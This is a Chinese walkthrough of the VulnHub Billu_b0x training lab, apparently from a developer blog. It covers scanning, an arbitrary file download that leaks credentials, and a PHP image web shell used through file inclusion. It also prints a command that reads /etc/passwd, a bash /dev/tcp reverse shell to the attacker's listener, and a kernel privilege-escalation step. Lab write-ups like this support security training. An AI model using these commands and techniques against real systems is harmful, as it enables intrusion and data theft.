一、靶机下载

下载链接:https://download.vulnhub.com/billu/Billu_b0x.zip

二、Billu_b0x靶机搭建

将下载好的靶机环境,用VMware导入即可使用,文件->打开
在这里插入图片描述
在这里插入图片描述
导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

三、攻击过程

kali IP:192.168.59.129
靶机IP:192.168.59.131

1、主机发现

nmap -sn 192.168.212.0/24
在这里插入图片描述

2、端口扫描

方法一:
nmap -sS 192.168.212.8
在这里插入图片描述
方法二:
masscan 192.168.212.8 -p 0-65535 --rate=10000
在这里插入图片描述

3、端口对应服务识别

nmap -sV -T4 -O 192.168.212.8 -p 22,80
在这里插入图片描述

4、漏洞利用与发现

访问WEB网站如下图
尝试80端口的访问,尝试弱口令以及爆破,万能密码注入,失败,暂时放弃
在这里插入图片描述
目录扫描
在这里插入图片描述
发现http://192.168.212.8/add ,尝试上传一个图片,可以看到没有提示成功没有提示失败,多次上传,猜测可能该页面是纯静态页面,用来迷惑攻击者
在这里插入图片描述
每个目录都查看一遍,发现phpinfo信息
在这里插入图片描述
发现http://192.168.212.8/test,提示“file”参数为空,请在“file”参数中提供文件路径
在这里插入图片描述
burpsuite抓包,GET方式传递参数,仍旧提示file参数为空
在这里插入图片描述
POST方式传递参数,会直接下载文件
在这里插入图片描述
为了方便查看内容,直接用burpsuite,发现可以看任何文件内容
在这里插入图片描述
既然可以任意文件下载,就把add.php、in.php、c.php、index.php、show.php、panel.php都查看一下,在c.php中发现连接数据库的密码
在这里插入图片描述
猜测是否有后台登陆界面,换个字典文件,继续扫描
在这里插入图片描述
发现可疑目录
在这里插入图片描述
访问发现是phpmyadmin
在这里插入图片描述
输入用户名密码登录"billu",“b0x_billu” 登录成功之后,发现账户密码,猜测是首页的
在这里插入图片描述
是首页登陆用户名密码biLLu/hEx_it,成功登录首页
在这里插入图片描述
发现该页面存在本地文件包含漏洞,可以利用前面test页面存在的任意文件下载漏洞(post形式的文件包含),下载该页面的代码,审计代码可以看到存在文件包含漏洞
在这里插入图片描述
在这里插入图片描述
上传一个php一句话图片马,然后利用文件包含
首先制作php一句话木马图片并上传
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
上传图片,上传后文件包含图片
在这里插入图片描述
在这里插入图片描述
接下来还是使用burp,在URL的post请求中加入POST /panel.php?x=cat%20/etc/passwd,正文中加入load=uploaded_images/11-sysmm.jpg&continue=continu
在这里插入图片描述
可以看到命令已经成功执行,接下来就是反弹shell
kali命令行里输入nc -lvnp 6666开始监听,同时burp的post请求中执行echo “bash -i >& /dev/tcp/192.168.212.129/6666 0>&1” | bash,注意要将此命令先经过URL编码才能发送
在这里插入图片描述
kali监听
在这里插入图片描述
POST发送反弹shell命令
在这里插入图片描述
成功反弹会话
在这里插入图片描述
查看内核版本,然后再kali使用searchsploit查找是否有exp
在这里插入图片描述
在这里插入图片描述
将提权文件上传到WWW目录并开启WEB服务
在这里插入图片描述
下载到靶机
在这里插入图片描述
运行exp,成功提权
在这里插入图片描述

较好的参考

https://www.colabug.com/2018/1015/4905959/

总结:

1.信息收集
2.目录扫描,phpinfo信息泄露,注入,ssh用户和数据库用户一样存在风险
3.test页面存在post形式的文件包含(文件任意下载),panel.php页面存在文件包含漏洞
4.文件上传get shell
5.内核漏洞提权

点击阅读全文
Logo

华为开发者空间,是为全球开发者打造的专属开发空间,汇聚了华为优质开发资源及工具,致力于让每一位开发者拥有一台云主机,基于华为根生态开发、创新。

更多推荐